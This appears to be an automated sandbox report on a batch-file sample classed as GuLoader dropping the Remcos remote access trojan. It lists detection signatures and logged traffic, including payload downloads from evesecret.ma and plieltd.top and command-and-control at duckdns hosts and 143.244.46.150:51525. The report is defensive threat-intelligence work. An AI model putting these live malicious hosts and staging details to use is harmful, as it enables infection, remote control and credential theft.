Windows Analysis Report
Lista produkt#U00f3w POL56583753Sarchmentdoc.bat

Overview

General Information

Sample name: Lista produkt#U00f3w POL56583753Sarchmentdoc.bat
renamed because original name is a hash value
Original sample name: Lista produktw POL56583753Sarchmentdoc.bat
Analysis ID: 1543699
MD5: 5f579a63bffce450528b213955a14615
SHA1: c8943b3b8055327a7b85249c9f2448b6df1967eb
SHA256: 83d574c4b6620c67416e9b444fe90ea882eb86ec747641bf5113df82280525b5
Tags: batuser-AdamekZbadam
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: Yara match File source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown HTTPS traffic detected: 37.230.62.86:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.230.62.86:443 -> 192.168.2.6:52002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:52023 version: TLS 1.2
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*/1L source: msiexec.exe, 00000013.00000002.2741454011.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*h# source: msiexec.exe, 00000013.00000002.2741454011.0000000002B17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbDp source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb( source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2436956991.00000000078C4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040AE51 FindFirstFileW,FindNextFileW, 18_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 19_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 20_2_00407898
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52090 -> 143.244.46.150:51525
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:52104 -> 143.244.46.150:51525
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:52115 -> 143.244.46.150:51525
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:52140 -> 143.244.46.150:51525
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:52139 -> 143.244.46.150:51525
Source: unknown DNS query: name: odinga.duckdns.org
Source: unknown DNS query: name: updated212.duckdns.org
Source: global traffic TCP traffic: 192.168.2.6:52090 -> 143.244.46.150:51525
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:52116 -> 178.237.33.50:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:52002 -> 37.230.62.86:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:52023 -> 104.21.56.189:443
Source: global traffic HTTP traffic detected: GET /Misforstaaelserne.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: evesecret.maConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /eYyaWC130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: evesecret.maCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /eYyaWC130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /Misforstaaelserne.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: evesecret.maConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /eYyaWC130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: evesecret.maCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /eYyaWC130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000012.00000002.2745228317.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000012.00000002.2745228317.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: evesecret.ma
Source: global traffic DNS traffic detected: DNS query: plieltd.top
Source: global traffic DNS traffic detected: DNS query: odinga.duckdns.org
Source: global traffic DNS traffic detected: DNS query: updated212.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: bhv2369.tmp.18.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv2369.tmp.18.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv2369.tmp.18.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: powershell.exe, 00000005.00000002.2436956991.0000000007890000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.2297010038.0000014FF9539000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mx
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: powershell.exe, 00000002.00000002.2262684973.0000014F81D89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://evesecret.ma
Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp)
Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp;
Source: msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpeiX
Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpj
Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpo
Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpy
Source: powershell.exe, 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv2369.tmp.18.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv2369.tmp.18.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv2369.tmp.18.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv2369.tmp.18.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv2369.tmp.18.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2262684973.0000014F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2413093891.0000000004C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv2369.tmp.18.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv2369.tmp.18.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: msiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729547178.00000000034CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729523881.00000000034CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000014.00000003.2729547178.00000000034CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729523881.00000000034CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.compData
Source: msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 00000012.00000002.2744526417.0000000002EA4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhv2369.tmp.18.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: bhv2369.tmp.18.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv2369.tmp.18.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv2369.tmp.18.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv2369.tmp.18.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv2369.tmp.18.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.2262684973.0000014F80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2413093891.0000000004C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhv2369.tmp.18.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv2369.tmp.18.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhv2369.tmp.18.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhv2369.tmp.18.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv2369.tmp.18.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv2369.tmp.18.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: powershell.exe, 00000002.00000002.2262684973.0000014F8022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2262684973.0000014F818D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://evesecret.ma
Source: powershell.exe, 00000002.00000002.2262684973.0000014F8022D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://evesecret.ma/Misforstaaelserne.psmP
Source: powershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://evesecret.ma/Misforstaaelserne.psmXRdl
Source: bhv2369.tmp.18.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
Source: bhv2369.tmp.18.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
Source: bhv2369.tmp.18.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
Source: bhv2369.tmp.18.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
Source: bhv2369.tmp.18.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
Source: bhv2369.tmp.18.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
Source: bhv2369.tmp.18.dr String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhv2369.tmp.18.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2262684973.0000014F80BB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhv2369.tmp.18.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv2369.tmp.18.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv2369.tmp.18.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msiexec.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv2369.tmp.18.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv2369.tmp.18.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv2369.tmp.18.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv2369.tmp.18.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv2369.tmp.18.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
Source: bhv2369.tmp.18.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
Source: bhv2369.tmp.18.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
Source: bhv2369.tmp.18.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
Source: msiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://plieltd.top/#n
Source: msiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://plieltd.top/?n
